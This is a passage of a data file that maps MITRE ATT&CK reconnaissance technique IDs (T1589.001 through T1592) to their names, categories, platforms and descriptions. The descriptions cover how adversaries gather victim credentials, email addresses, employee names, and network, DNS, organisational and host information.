                          'Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET '
                          'Leaks) Gathering this information may reveal opportunities for other forms of '
                          'reconnaissance (ex: [Search Open '
                          'Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for '
                          'Information](https://attack.mitre.org/techniques/T1598)), establishing operational '
                          'resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or '
                          'initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Valid '
                          'Accounts](https://attack.mitre.org/techniques/T1078)).',
           'name': 'Gather Victim Identity Information',
           'platforms': ['PRE']},
 'T1589.001': {'attack_id': 'T1589.001',
               'categories': ['reconnaissance'],
               'description': 'Before compromising a victim, adversaries may gather credentials that can be used '
                              'during targeting. Account credentials gathered by adversaries may be those directly '
                              'associated with the target victim organization or attempt to take advantage of the '
                              'tendency for users to use the same passwords across personal and business accounts.\n'
                              '\n'
                              'Adversaries may gather credentials from potential victims in various ways, such as '
                              'direct elicitation via [Phishing for '
                              'Information](https://attack.mitre.org/techniques/T1598). Adversaries may also '
                              'compromise sites then include malicious content designed to collect website '
                              'authentication cookies from visitors.(Citation: ATT ScanBox) Credential information may '
                              'also be exposed to adversaries via leaks to online or other accessible data sets (ex: '
                              '[Search Engines](https://attack.mitre.org/techniques/T1593/002), breach dumps, code '
                              'repositories, etc.).(Citation: Register Deloitte)(Citation: Register Uber)(Citation: '
                              'Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub '
                              'truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Adversaries may also '
                              'purchase credentials from dark web or other black-markets. Gathering this information '
                              'may reveal opportunities for other forms of reconnaissance (ex: [Search Open '
                              'Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for '
                              'Information](https://attack.mitre.org/techniques/T1598)), establishing operational '
                              'resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), '
                              'and/or initial access (ex: [External Remote '
                              'Services](https://attack.mitre.org/techniques/T1133) or [Valid '
                              'Accounts](https://attack.mitre.org/techniques/T1078)).',
               'name': 'Credentials',
               'platforms': ['PRE']},
 'T1589.002': {'attack_id': 'T1589.002',
               'categories': ['reconnaissance'],
               'description': 'Before compromising a victim, adversaries may gather email addresses that can be used '
                              'during targeting. Even if internal instances exist, organizations may have '
                              'public-facing email infrastructure and addresses for employees.\n'
                              '\n'
                              'Adversaries may easily gather email addresses, since they may be readily available and '
                              'exposed via online or other accessible data sets (ex: [Social '
                              'Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned '
                              'Websites](https://attack.mitre.org/techniques/T1594)).(Citation: HackersArise '
                              'Email)(Citation: CNET Leaks) Gathering this information may reveal opportunities for '
                              'other forms of reconnaissance (ex: [Search Open '
                              'Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for '
                              'Information](https://attack.mitre.org/techniques/T1598)), establishing operational '
                              'resources (ex: [Email Accounts](https://attack.mitre.org/techniques/T1586/002)), and/or '
                              'initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).',
               'name': 'Email Addresses',
               'platforms': ['PRE']},
 'T1589.003': {'attack_id': 'T1589.003',
               'categories': ['reconnaissance'],
               'description': 'Before compromising a victim, adversaries may gather employee names that can be used '
                              'during targeting. Employee names be used to derive email addresses as well as to help '
                              'guide other reconnaissance efforts and/or craft more-believable lures.\n'
                              '\n'
                              'Adversaries may easily gather employee names, since they may be readily available and '
                              'exposed via online or other accessible data sets (ex: [Social '
                              'Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned '
                              'Websites](https://attack.mitre.org/techniques/T1594)).(Citation: OPM Leak) Gathering '
                              'this information may reveal opportunities for other forms of reconnaissance (ex: '
                              '[Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing '
                              'for Information](https://attack.mitre.org/techniques/T1598)), establishing operational '
                              'resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), '
                              'and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or '
                              '[Valid Accounts](https://attack.mitre.org/techniques/T1078)).',
               'name': 'Employee Names',
               'platforms': ['PRE']},
 'T1590': {'attack_id': 'T1590',
           'categories': ['reconnaissance'],
           'description': "Before compromising a victim, adversaries may gather information about the victim's "
                          'networks that can be used during targeting. Information about networks may include a '
                          'variety of details, including administrative data (ex: IP ranges, domain names, etc.) as '
                          'well as specifics regarding its topology and operations.\n'
                          '\n'
                          'Adversaries may gather this information in various ways, such as direct collection actions '
                          'via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for '
                          'Information](https://attack.mitre.org/techniques/T1598). Information about networks may '
                          'also be exposed to adversaries via online or other accessible data sets (ex: [Search Open '
                          'Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: '
                          'WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may '
                          'reveal opportunities for other forms of reconnaissance (ex: [Active '
                          'Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open '
                          'Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational '
                          'resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or '
                          '[Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial '
                          'access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).',
           'name': 'Gather Victim Network Information',
           'platforms': ['PRE']},
 'T1590.001': {'attack_id': 'T1590.001',
               'categories': ['reconnaissance'],
               'description': "Before compromising a victim, adversaries may gather information about the victim's "
                              'network domain(s) that can be used during targeting. Information about domains and '
                              'their properties may include a variety of details, including what domain(s) the victim '
                              'owns as well as administrative data (ex: name, registrar, etc.) and more directly '
                              'actionable information such as contacts (email addresses and phone numbers), business '
                              'addresses, and name servers.\n'
                              '\n'
                              'Adversaries may gather this information in various ways, such as direct collection '
                              'actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing '
                              'for Information](https://attack.mitre.org/techniques/T1598). Information about victim '
                              'domains and their properties may also be exposed to adversaries via online or other '
                              'accessible data sets (ex: '
                              '[WHOIS](https://attack.mitre.org/techniques/T1596/002)).(Citation: WHOIS)(Citation: DNS '
                              'Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal '
                              'opportunities for other forms of reconnaissance (ex: [Search Open Technical '
                              'Databases](https://attack.mitre.org/techniques/T1596), [Search Open '
                              'Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Phishing for '
                              'Information](https://attack.mitre.org/techniques/T1598)), establishing operational '
                              'resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or '
                              '[Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial '
                              'access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).',
               'name': 'Domain Properties',
               'platforms': ['PRE']},
 'T1590.002': {'attack_id': 'T1590.002',
               'categories': ['reconnaissance'],
               'description': "Before compromising a victim, adversaries may gather information about the victim's DNS "
                              'that can be used during targeting. DNS information may include a variety of details, '
                              'including registered name servers as well as records that outline addressing for a '
                              'target’s subdomains, mail servers, and other hosts.\n'
                              '\n'
                              'Adversaries may gather this information in various ways, such as querying or otherwise '
                              'collecting details via [DNS/Passive '
                              'DNS](https://attack.mitre.org/techniques/T1596/001). DNS information may also be '
                              'exposed to adversaries via online or other accessible data sets (ex: [Search Open '
                              'Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: DNS '
                              'Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal '
                              'opportunities for other forms of reconnaissance (ex: [Search Open Technical '
                              'Databases](https://attack.mitre.org/techniques/T1596), [Search Open '
                              'Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Active '
                              'Scanning](https://attack.mitre.org/techniques/T1595)), establishing operational '
                              'resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or '
                              '[Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial '
                              'access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).',
               'name': 'DNS',
               'platforms': ['PRE']},
 'T1590.003': {'attack_id': 'T1590.003',
               'categories': ['reconnaissance'],
               'description': "Before compromising a victim, adversaries may gather information about the victim's "
                              'network trust dependencies that can be used during targeting. Information about network '
                              'trusts may include a variety of details, including second or third-party '
                              'organizations/domains (ex: managed service providers, contractors, etc.) that have '
                              'connected (and potentially elevated) network access.\n'
                              '\n'
                              'Adversaries may gather this information in various ways, such as direct elicitation via '
                              '[Phishing for Information](https://attack.mitre.org/techniques/T1598). Information '
                              'about network trusts may also be exposed to adversaries via online or other accessible '
                              'data sets (ex: [Search Open Technical '
                              'Databases](https://attack.mitre.org/techniques/T1596)).(Citation: Pentesting AD '
                              'Forests) Gathering this information may reveal opportunities for other forms of '
                              'reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or '
                              '[Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), '
                              'establishing operational resources (ex: [Acquire '
                              'Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise '
                              'Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: '
                              '[Trusted Relationship](https://attack.mitre.org/techniques/T1199)).',
               'name': 'Network Trust Dependencies',
               'platforms': ['PRE']},
 'T1590.004': {'attack_id': 'T1590.004',
               'categories': ['reconnaissance'],
               'description': "Before compromising a victim, adversaries may gather information about the victim's "
                              'network topology that can be used during targeting. Information about network '
                              'topologies may include a variety of details, including the physical and/or logical '
                              'arrangement of both external-facing and internal network environments. This information '
                              'may also include specifics regarding network devices (gateways, routers, etc.) and '
                              'other infrastructure.\n'
                              '\n'
                              'Adversaries may gather this information in various ways, such as direct collection '
                              'actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing '
                              'for Information](https://attack.mitre.org/techniques/T1598). Information about network '
                              'topologies may also be exposed to adversaries via online or other accessible data sets '
                              '(ex: [Search Victim-Owned '
                              'Websites](https://attack.mitre.org/techniques/T1594)).(Citation: DNS Dumpster) '
                              'Gathering this information may reveal opportunities for other forms of reconnaissance '
                              '(ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596) or '
                              '[Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), '
                              'establishing operational resources (ex: [Acquire '
                              'Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise '
                              'Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: '
                              '[External Remote Services](https://attack.mitre.org/techniques/T1133)).',
               'name': 'Network Topology',
               'platforms': ['PRE']},
 'T1590.005': {'attack_id': 'T1590.005',
               'categories': ['reconnaissance'],
               'description': "Before compromising a victim, adversaries may gather the victim's IP addresses that can "
                              'be used during targeting. Public IP addresses may be allocated to organizations by '
                              'block, or a range of sequential addresses. Information about assigned IP addresses may '
                              'include a variety of details, such as which IP addresses are in use. IP addresses may '
                              'also enable an adversary to derive other details about a victim, such as organizational '
                              'size, physical location(s), Internet service provider, and or where/how their '
                              'publicly-facing infrastructure is hosted.\n'
                              '\n'
                              'Adversaries may gather this information in various ways, such as direct collection '
                              'actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing '
                              'for Information](https://attack.mitre.org/techniques/T1598). Information about assigned '
                              'IP addresses may also be exposed to adversaries via online or other accessible data '
                              'sets (ex: [Search Open Technical '
                              'Databases](https://attack.mitre.org/techniques/T1596)).(Citation: WHOIS)(Citation: DNS '
                              'Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal '
                              'opportunities for other forms of reconnaissance (ex: [Active '
                              'Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open '
                              'Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational '
                              'resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or '
                              '[Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial '
                              'access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).',
               'name': 'IP Addresses',
               'platforms': ['PRE']},
 'T1590.006': {'attack_id': 'T1590.006',
               'categories': ['reconnaissance'],
               'description': "Before compromising a victim, adversaries may gather information about the victim's "
                              'network security appliances that can be used during targeting. Information about '
                              'network security appliances may include a variety of details, such as the existence and '
                              'specifics of deployed firewalls, content filters, and proxies/bastion hosts. '
                              'Adversaries may also target information about victim network-based intrusion detection '
                              'systems (NIDS) or other appliances related to defensive cybersecurity operations.\n'
                              '\n'
                              'Adversaries may gather this information in various ways, such as direct collection '
                              'actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing '
                              'for Information](https://attack.mitre.org/techniques/T1598).(Citation: Nmap Firewalls '
                              'NIDS) Information about network security appliances may also be exposed to adversaries '
                              'via online or other accessible data sets (ex: [Search Victim-Owned '
                              'Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may '
                              'reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical '
                              'Databases](https://attack.mitre.org/techniques/T1596) or [Search Open '
                              'Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational '
                              'resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or '
                              '[Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial '
                              'access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).',
               'name': 'Network Security Appliances',
               'platforms': ['PRE']},
 'T1591': {'attack_id': 'T1591',
           'categories': ['reconnaissance'],
           'description': "Before compromising a victim, adversaries may gather information about the victim's "
                          'organization that can be used during targeting. Information about an organization may '
                          'include a variety of details, including the names of divisions/departments, specifics of '
                          'business operations, as well as the roles and responsibilities of key employees.\n'
                          '\n'
                          'Adversaries may gather this information in various ways, such as direct elicitation via '
                          '[Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about an '
                          'organization may also be exposed to adversaries via online or other accessible data sets '
                          '(ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned '
                          'Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice '
                          'Leak)(Citation: DOB Business Lookup) Gathering this information may reveal opportunities '
                          'for other forms of reconnaissance (ex: [Phishing for '
                          'Information](https://attack.mitre.org/techniques/T1598) or [Search Open '
                          'Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational '
                          'resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or '
                          '[Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access '
                          '(ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Trusted '
                          'Relationship](https://attack.mitre.org/techniques/T1199)).',
           'name': 'Gather Victim Org Information',
           'platforms': ['PRE']},
 'T1591.001': {'attack_id': 'T1591.001',
               'categories': ['reconnaissance'],
               'description': "Before compromising a victim, adversaries may gather the victim's physical location(s) "
                              'that can be used during targeting. Information about physical locations of a target '
                              'organization may include a variety of details, including where key resources and '
                              'infrastructure are housed. Physical locations may also indicate what legal jurisdiction '
                              'and/or authorities the victim operates within.\n'
                              '\n'
                              'Adversaries may gather this information in various ways, such as direct elicitation via '
                              '[Phishing for Information](https://attack.mitre.org/techniques/T1598). Physical '
                              'locations of a target organization may also be exposed to adversaries via online or '
                              'other accessible data sets (ex: [Search Victim-Owned '
                              'Websites](https://attack.mitre.org/techniques/T1594) or [Social '
                              'Media](https://attack.mitre.org/techniques/T1593/001)).(Citation: ThreatPost Broadvoice '
                              'Leak)(Citation: DOB Business Lookup) Gathering this information may reveal '
                              'opportunities for other forms of reconnaissance (ex: [Phishing for '
                              'Information](https://attack.mitre.org/techniques/T1598) or [Search Open '
                              'Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational '
                              'resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or '
                              '[Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial '
                              'access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Hardware '
                              'Additions](https://attack.mitre.org/techniques/T1200)).',
               'name': 'Determine Physical Locations',
               'platforms': ['PRE']},
 'T1591.002': {'attack_id': 'T1591.002',
               'categories': ['reconnaissance'],
               'description': "Before compromising a victim, adversaries may gather information about the victim's "
                              'business relationships that can be used during targeting. Information about an '
                              'organization’s business relationships may include a variety of details, including '
                              'second or third-party organizations/domains (ex: managed service providers, '
                              'contractors, etc.) that have connected (and potentially elevated) network access. This '
                              'information may also reveal supply chains and shipment paths for the victim’s hardware '
                              'and software resources.\n'
                              '\n'
                              'Adversaries may gather this information in various ways, such as direct elicitation via '
                              '[Phishing for Information](https://attack.mitre.org/techniques/T1598). Information '
                              'about business relationships may also be exposed to adversaries via online or other '
                              'accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) '
                              'or [Search Victim-Owned '
                              'Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice '
                              'Leak) Gathering this information may reveal opportunities for other forms of '
                              'reconnaissance (ex: [Phishing for '
                              'Information](https://attack.mitre.org/techniques/T1598) or [Search Open '
                              'Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational '
                              'resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or '
                              '[Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial '
                              'access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195), '
                              '[Drive-by Compromise](https://attack.mitre.org/techniques/T1189), or [Trusted '
                              'Relationship](https://attack.mitre.org/techniques/T1199)).',
               'name': 'Business Relationships',
               'platforms': ['PRE']},
 'T1591.003': {'attack_id': 'T1591.003',
               'categories': ['reconnaissance'],
               'description': "Before compromising a victim, adversaries may gather information about the victim's "
                              'business tempo that can be used during targeting. Information about an organization’s '
                              'business tempo may include a variety of details, including operational hours/days of '
                              'the week. This information may also reveal times/dates of purchases and shipments of '
                              'the victim’s hardware and software resources.\n'
                              '\n'
                              'Adversaries may gather this information in various ways, such as direct elicitation via '
                              '[Phishing for Information](https://attack.mitre.org/techniques/T1598). Information '
                              'about business tempo may also be exposed to adversaries via online or other accessible '
                              'data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search '
                              'Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: '
                              'ThreatPost Broadvoice Leak) Gathering this information may reveal opportunities for '
                              'other forms of reconnaissance (ex: [Phishing for '
                              'Information](https://attack.mitre.org/techniques/T1598) or [Search Open '
                              'Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational '
                              'resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or '
                              '[Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial '
                              'access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or '
                              '[Trusted Relationship](https://attack.mitre.org/techniques/T1199))',
               'name': 'Identify Business Tempo',
               'platforms': ['PRE']},
 'T1591.004': {'attack_id': 'T1591.004',
               'categories': ['reconnaissance'],
               'description': 'Before compromising a victim, adversaries may gather information about identities and '
                              'roles within the victim organization that can be used during targeting. Information '
                              'about business roles may reveal a variety of targetable details, including identifiable '
                              'information for key personnel as well as what data/resources they have access to.\n'
                              '\n'
                              'Adversaries may gather this information in various ways, such as direct elicitation via '
                              '[Phishing for Information](https://attack.mitre.org/techniques/T1598). Information '
                              'about business roles may also be exposed to adversaries via online or other accessible '
                              'data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search '
                              'Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: '
                              'ThreatPost Broadvoice Leak) Gathering this information may reveal opportunities for '
                              'other forms of reconnaissance (ex: [Phishing for '
                              'Information](https://attack.mitre.org/techniques/T1598) or [Search Open '
                              'Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational '
                              'resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or '
                              '[Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial '
                              'access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).',
               'name': 'Identify Roles',
               'platforms': ['PRE']},
 'T1592': {'attack_id': 'T1592',
           'categories': ['reconnaissance'],
           'description': "Before compromising a victim, adversaries may gather information about the victim's hosts "
                          'that can be used during targeting. Information about hosts may include a variety of '
                          'details, including administrative data (ex: name, assigned IP, functionality, etc.) as well '
                          'as specifics regarding its configuration (ex: operating system, language, etc.).\n'
                          '\n'
                          'Adversaries may gather this information in various ways, such as direct collection actions '
                          'via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for '
                          'Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise '
                          'sites then include malicious content designed to collect host information from '
                          'visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries '
                          'via online or other accessible data 